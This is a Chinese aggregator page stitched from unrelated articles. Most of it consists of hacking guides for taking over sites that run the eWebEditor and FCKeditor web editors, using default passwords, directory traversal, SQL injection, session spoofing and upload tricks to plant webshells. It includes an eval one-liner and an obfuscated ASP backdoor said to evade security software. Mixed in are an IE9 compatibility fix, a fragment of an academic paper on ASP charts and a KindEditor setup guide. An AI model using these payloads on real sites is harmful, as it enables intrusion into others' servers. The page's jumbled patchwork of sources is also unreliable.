以下是小编为大家准备的浅析asp版本ewebeditor在线编辑器(共含9篇),欢迎大家前来参阅。同时,但愿您也能像本文投稿人“楼下买菜”一样,积极向本站投稿分享好文章。
Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛,对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:
默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),
NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb
默认的后台路径是admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
NO2.遍历目录漏洞(具体如下):
登陆编辑器---上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
此漏洞危害大大的,绝对恐怖
NO3.当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell
NO4.有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的asp、asa后缀样式表,也就是虽说的踩着脚印入侵。
还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb
NO5.注入2.1.6的注入就不多说了,如下保存为html文件修改action,直接上传cer马
union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,
S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_Medi
aSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a“ method=post name=myform enctype=”multipart/form-data“>
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单利用就是
site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码
NO6.有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下: (略)
NO.7还有种方式是最近坏客发现的
利用WebEditor session欺骗漏洞,进入后台:
漏洞文件:Admin_Private.asp
漏洞语句:
<%
If Session(”eWebEditor_User“) = ”“ Then
Response.Redirect ”admin_login.asp“
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题,
漏洞利用:
新建一个amxking.asp内容如下:
<%Session(”eWebEditor_User“) = ”11111111“%>
访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp
面对此种威胁网站管理员应该做好如下的防范措施:
1、使用了eWebEditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,建议数据库多方几层目录,防止数据库被 非法下载
2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止 进入后台管理界面
3、对Upload.asp语句进行修改,防止 利用其上传ASP木马从而获得WEB权限
4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行
这篇文章主要介绍了让IE8和IE9支持eWebEditor在线编辑器的方法,eWebEditor常用在ASP制作的网站后台中,是比较古老的一款在线编辑器了,需要让IE8和IE9支持的朋友可以参考下
最近在做网站的时候,发现eWebEditor在线文本编辑器不支持IE9,点击编辑器中的按钮都没有反应,之前本站发布过一篇《解决IE8不支持eWebEditor在线文本编辑器的方法》,但貌似在IE9下方法就失效了,在网上找到了终级解决方法,拿来给大家分享,
首先找到eWebEditor编辑器所在的目录,然后搜索到editor.js文件并用文本编辑器打开,然后找到BtnMouseUp函数,将该函数代码替换成如下代码即可:
代码如下:
function BtnMouseUp() {
if (event.srcElement.tagName != ”IMG“) {
event.cancelBubble = true;
return false;
}
var image = event.srcElement;
var element = image.parentElement;
try{
if (element.YUSERONCLICK) eval(element.YUSERONCLICK + ”anonymous()“);
}
catch(e){
if (element.YUSERONCLICK) eval(element.YUSERONCLICK + ”onclick(event)“);
}
element.className = ”BtnMouseOverUp“;
image.className = ”Ico“;
event.cancelBubble = true;
return false;
}
说明:以上代码中蓝色部分为eWebEditor在线文本编辑器兼容IE9IE8的核心代码,大家也可以根据实际情况更换BtnMouseUp()函数中的相应代码,
小提示:如果你的eWebEditor在线文本编辑器版本过老,在IE9下根本都无法打开eWebEditor界面,你可以在IE9中设置成浏览器兼容模式,即可正常在IE9中使用eWebEditor了。
脚本入侵 入侵ewebeditor编辑器一些技巧,使用ewebeditor的朋友可以参考下,
eWebEditor编辑器建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1”:eval request(“choxiaozi”)’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看eWebEditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----
02 sStyleName = Trim(Request(“d_name”)) 03 sStyleDir = Trim(Request(“d_dir”)) 04 sStyleCSS = Trim(Request(“d_css”)) 05 sStyleUploadDir = Trim(Request(“d_uploaddir”)) 06 sStyleBaseHref = Trim(Request(“d_basehref”)) 07 sStyleContentPath = Trim(Request(“d_contentpath”)) 08 sStyleWidth = Trim(Request(“d_width”)) 09 sStyleHeight = Trim(Request(“d_height”)) 10 sStyleMemo = Request(“d_memo”) 11 sStyleImageExt = Request(“d_imageext”) 12 sStyleFlashExt = Request(“d_flashext”) 13 sStyleMediaExt = Request(“d_mediaext”) 14 sStyleRemoteExt = Request(“d_remoteext”) 15 sStyleFileExt = Request(“d_fileext”) 16 sStyleImageSize = Request(“d_imagesize”) 17 sStyleFlashSize = Request(“d_flashsize”) 18 sStyleMediaSize = Request(“d_mediasize”) 19 sStyleRemoteSize = Request(“d_remotesize”) 20 sStyleFileSize = Request(“d_filesize”) 21 sStyleStateFlag = Request(“d_stateflag”) 22 sStyleAutoRemote = Request(“d_autoremote”) 23 sStyleShowBorder = Request(“d_showborder”) 24 sStyleUploadObject = Request(“d_uploadobject”) 25 sStyleAutoDir = Request(“d_autodir”) 26 sStyleDetectFromWord = Request(“d_detectfromword”) 27 sStyleInitMode = Request(“d_initmode”) 28 sStyleBaseUrl = Request(“d_baseurl”) 他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。 当然此处post失效了,所以我抓了下包,得到如下数据 01 www.2cto.com /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 02 03 POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1 04 Host: xxxx.com 05 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/0101 Firefox/12.0 06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 07 Accept-Language: en-US,en;q=0.5 08 Accept-Encoding: gzip, deflate 09 Connection: keep-alive 10 Referer: www.2cto.com /system/eWebEditor/admin_style.asp?action=styleset&id=50 11 Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK 12 Content-Type: application/x-www-form-urlencoded 13 Content-Length: 740 14 d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11 于是使用构造get提交方式: xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11 然后直接访问时,他显示是提交成功了,实际上也米有成功,需要我们先访问: xxxx.com/system/eWebEditor/admin_style.asp?action=styleset&id=50 然后在在地址栏中输入上边的get提交数据,就会显示成功, 这儿我们可以修改样式了,但是安全狗作怪使得asa、cer和asp;jpg等等的修改都无效,但是aaspsp这样的修改绕过去了安全狗,这儿可能是程序天然给我们的一个绕安全狗的方法吧!程序本身使用的代码有问题,他会替换aaspsp中完整的asp部分为空格使得剩下的部分还是asp,这儿的代码依旧是一个替换函数,就不多说了,前辈们已经写了很多了。就是这样的一个代码写法使得我们天然绕过了安全狗上传asp的文件了,重这里我们也可以得到启发,以后我们绕安全狗是不是也可以使用这样的代码写法去绕过,话不多说,留下余香。 接下来我曾填好了可以传的后缀asp,但是视乎目录有问题,以前默认的目录是uploadfiles这个文件目录,视乎是做了限制,于是我想到了修改上传文件目录,当然你可以仔细看我上边构造的哪个get提交上边的d_uploaddir属性的值是%2F,也就是一个/,于是我传上去的文件在根目录下。 当然这儿已经为我们上传做好了所有铺垫了,我们现在只需要一个可以绕过安全狗的马就ok了。 还记得以前解密一个asp木马的时候,里面有一个后门,当时只是以为那个是一个后门,但是后面有心人测试发现这个后门很是了得可以绕过护卫神,今天我又用它绕过了安全狗。 01 <% 02 codeds=“Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li” 03 execute (decode (codeds) ) 04 Function DeCode (Coded) 05 On Error Resume Next 06 For i = 1 To Len (Coded) 07 Curchar = Mid (Coded, i, 1) 08 If Asc (Curchar) = 16 then 09 Curchar = chr (8) 10 Elseif Asc (Curchar) = 24 then 11 Curchar = chr (12) 12 Elseif Asc (Curchar) = 32 then 13 Curchar = chr (18) 14 Else 15 Curchar = chr (Asc (Curchar) -3) 16 End if 17 DeCode = Decode&Curchar 18 Next 19 End Function 20 'response.write(decode(codeds)) 21 %> 最后突破成功!上传一句话成功!!! from:lanu.sinaapp.com/jishuwenzhang/113.html ewebeditor编辑器可一般默认数据库路径是db/ewebeditor.mdb 默认的后台路径是admin/admin_login.asp 有的时候管理员修改为asp、asa,可以插入一句话 有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的后缀样式表,直接利用上传,具体看完文章我想大家都有个全新的认识了 还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的 例如:db/#ewebeditor.asa、db/#ewebeditor.asp 有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞 简单利用就是 site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200 www.siqinci.com/ewebedito ... amp;style=full_v200 可以利用nbsi进行猜解,对此进行注入 还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的 这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下: 文件上传 还有种方式是最近坏客发现的 利用WebEditor session欺骗漏洞,进入后台: 漏洞文件:Admin_Private.asp 漏洞语句:<% If Session(“eWebEditor_User”) = “” Then Response.Redirect “admin_login.asp” Response.End End If 只判断了session,没有判断cookies和路径的验证问题, 浅析Webedit在线编辑器的入侵篇5:浅析Webedit在线编辑器的入侵
,
漏洞利用:
新建一个amxking.asp内容如下:
<%Session(“eWebEditor_User”) = “11111111”%>
访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp
利用ASP实现在线统计图表
耿昌宇,居悌
(南京邮电学院,江苏 南京,210003)
摘 要:本文分析了浏览器利用HTTP头信息区分内容媒体类型的方法,并在剖析了图像文件格式后探讨了利用ASP结合COM
组件技术实现在线统计图表的方法。
关键词:HTTP头、内容类型、Web图像文件格式、组件化编程
Draw Online Statistic Chart Using ASP
Geng Changyu, Ju Ti
(
Nanjing
Universityof Post and Telecommunications,
Abstract: With the analysis of the method browser uses to distinguish the content media-type by the HTTP header and the research of file formats of several kinds of graphic files, this paper discusses the method of drawing online statistic chart using ASP and COM component technology.
Key Words: HTTP header, Content-Type, Web Graphics File Formats, Componential Programming
一、引言
在开发B-S模式数据库应用时,常常需要实现在线的统计图表。使用客户端ActiveX控件显示在线统计图表是一个很好的实现途径,微软的MSChart2.0就提供了折线图、直方图、饼图等多种形式的统计图表。但客户端ActiveX控件只能在微软的Windows系列平台工作,在考虑到页面需要在不同平台的浏览器上显示时,就不得不考虑服务器端在线统计图表的实现。
本文简要介绍了常用的Web图像文件格式和浏览器对图像的处理过程,然后分析了在服务器端实现在线统计图表所必须满足的条件,并在此基础上提出了用ASP结合COM组件技术实现在线统计图表的方法。
------
收集整理------二、Web图像文件格式和浏览器对图像的处理
常用的Web图像文件格式有Bitmap、Gif、Jpg等几种,其中Bitmap格式未经压缩,因而文件尺寸较大,为了适应网络之间的传输,通常使用可以将图像进行压缩的Gif和
Jpg格式,这些图像文件都是二进制文件格式。
根据HTTP协议,当一个HTTP响应消息中包含一个消息体时,该HTTP消息用消息头中的Content-Type域来指明消息体的媒体类型,用消息头中的Content-Encoding域来指明消息体的编码方式。如果在HTTP消息头中没有指定Content_Type,则消息接收者可以尝试通过检查消息体
的内容和/或识别资源所用的URL的'扩展名来猜测消息体的媒体类型,当猜测失败时,消息接收者应该将消息体的媒体类型作为Application/Octet-Stream来处理。如果在HTTP消息头中没有指定Content_Encoding,则表示消息体未经编码。Bitmap格式、Gif格式和Jpg格式的对应的Content-Type消息头分别是
image/bmp、image/gif和image/jpeg,当浏览器收到一个HTTP响应消息的Content-Type消息头为其中之一时,浏览器就对该消息的消息体按相应的图像格式来处理。
FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间:
源码地址:sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
SetHandler application/x-httpd-php
2.实用编辑器上传htaccess文件.
www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html
www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问www.badguest.cn/上传目录/shell_php.gif
在文件\User\award\awardAction.asp中:
1
2
3
4
5
6
7
8
9
Integral=NoSqlHack(request.QueryString(“Integral”))
ifaction=“join”then
User_Conn.execute(“Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values(”&CintStr(prizeID)&“,'”&session(“FS_UserNumber”)&“',”&CintStr(awardID)&“)”)
'获得当前参加人数--------------------------------
User_Conn.execute(“Update FS_ME_Users set Integral=(Integral-”&Integral&“) where usernumber='”&session(“FS_UserNumber”)&“'”)
请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息
webshell还可以用来代替access
我们文件管理中上传个图片文件:
192.168.1.101/UserFiles/27015564I69/_09_27_01_10_0390446.jpg
UserNumber就是等于27015564I69
通过以上的sql注入漏洞,直接update为test.asp
192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1
退出再重新登录
生成test.asp目录,后续上传的文件都会保存在该文件中
利用iis解析漏洞获取webshell
作者: 字体:[增加 减小] 类型:转载
对于网页编辑器对做项目的时候是非常的又用的一个编辑器,大大的减轻了开发人员的负担,感觉KindSoft是一个不错的选择,因此也在不断的使用接下来介绍参数配置,需要的朋友可以了解下
对于网页编辑器对做项目的时候是非常的又用的一个编辑器,大大的减轻了开发人员的负担,感觉KindSoft是一个不错的选择,因此也在不断的使用,
下面对一些简单的配置进行归纳一下:
首先是将下载的KindSoft文件导入到项目的目录下;
代码如下:
这两个引用在xx.aspx文件的Head部分
然后插入下面的一段代码:
代码如下:
tbContent是要嵌入的Input标签的id值,呵呵嘿嘿、、惊喜就出现了;如下图所示:
但是如果要进行图片、flash或者视频的上传的话,你就会很郁闷了,很多时候都会因为上传路径不对而出错,因此你需要设置你的图片、flash或者视频文件的路径;只需将上面一段代码改为如下部分则可以满足基本的需求了:
代码如下:
<script. language=“javascript” type=“text/javascript”>
KindEditor.ready(function (K) {
K.create(‘#tbContent‘, {
uploadJson: ‘../Content/kindeditor-4.1.4/asp.net/upload_json.ashx‘,
fileManagerJson: ‘../Content/kindeditor-4.1.4/asp.net/file_manager_json.ashx‘,
allowFileManager: true
});
});
上面标记颜色的部分应该根据自己的文件路径选择合适的路径;
最后就是有关编辑器中的控件并不是自己所需要的,所以你需要在如下的路径进行配置:
展开kindeditor-4.1.4,找到kindeditor.js文件,双击就去,然后找到在246页左右,就有一个Items,在之后又如下的配置参数:
代码如下:
[
‘source‘, ‘|‘, ‘undo‘, ‘redo‘, ‘|‘, ‘preview‘, ‘print‘, ‘template‘, ‘code‘, ‘cut‘, ‘copy‘, ‘paste‘,
‘plainpaste‘, ‘wordpaste‘, ‘|‘, ‘justifyleft‘, ‘justifycenter‘, ‘justifyright‘,
‘justifyfull‘, ‘insertorderedlist‘, ‘insertunorderedlist‘, ‘indent‘, ‘outdent‘, ‘subscript‘,
‘superscript‘, ‘clearhtml‘, ‘quickformat‘, ‘selectall‘, ‘|‘, ‘fullscreen‘, ‘/‘,
‘formatblock‘, ‘fontname‘, ‘fontsize‘, ‘|‘, ‘forecolor‘, ‘hilitecolor‘, ‘bold‘,
‘italic‘, ‘underline‘, ‘strikethrough‘, ‘lineheight‘, ‘removeformat‘, ‘|‘, ‘image‘, ‘multiimage‘,
‘flash‘, ‘media‘, ‘insertfile‘, ‘table‘, ‘hr‘, ‘emoticons‘, ‘baidumap‘, ‘pagebreak‘,
‘anchor‘, ‘link‘, ‘unlink‘, ‘|‘, ‘about‘
]
参数的解释如下:
sourceHTML代码preview预览undo后退redo前进cut剪切copy复制paste粘贴plainpaste粘贴为无格式文本wordpaste从Word粘贴selectall全选justifyleft左对齐justifycenter居中justifyright右对齐justifyfull两端对齐insertorderedlist编号insertunorderedlist项目符号indent增加缩进outdent减少缩进subscript下标superscript上标formatblock段落fontname字体fontsize文字大小forecolor文字颜色hilitecolor文字背景bold粗体italic斜体underline下划线strikethrough删除线removeformat删除格式image图片flashFlashmedia视音频table表格hr插入横线emoticons插入表情link超级链接unlink取消超级链接fullscreen全屏显示about关于print打印code插入程序代码mapGoogle地图baidumap百度地图lineheight行距clearhtml清理HTML代码pagebreak插入分页符quickformat一键排版insertfile插入文件template插入模板anchor插入锚点
★ 作文在线
★ 散文在线
★ 兰亭集序在线朗读
★ 干部在线学习心得
★ 古文翻译在线
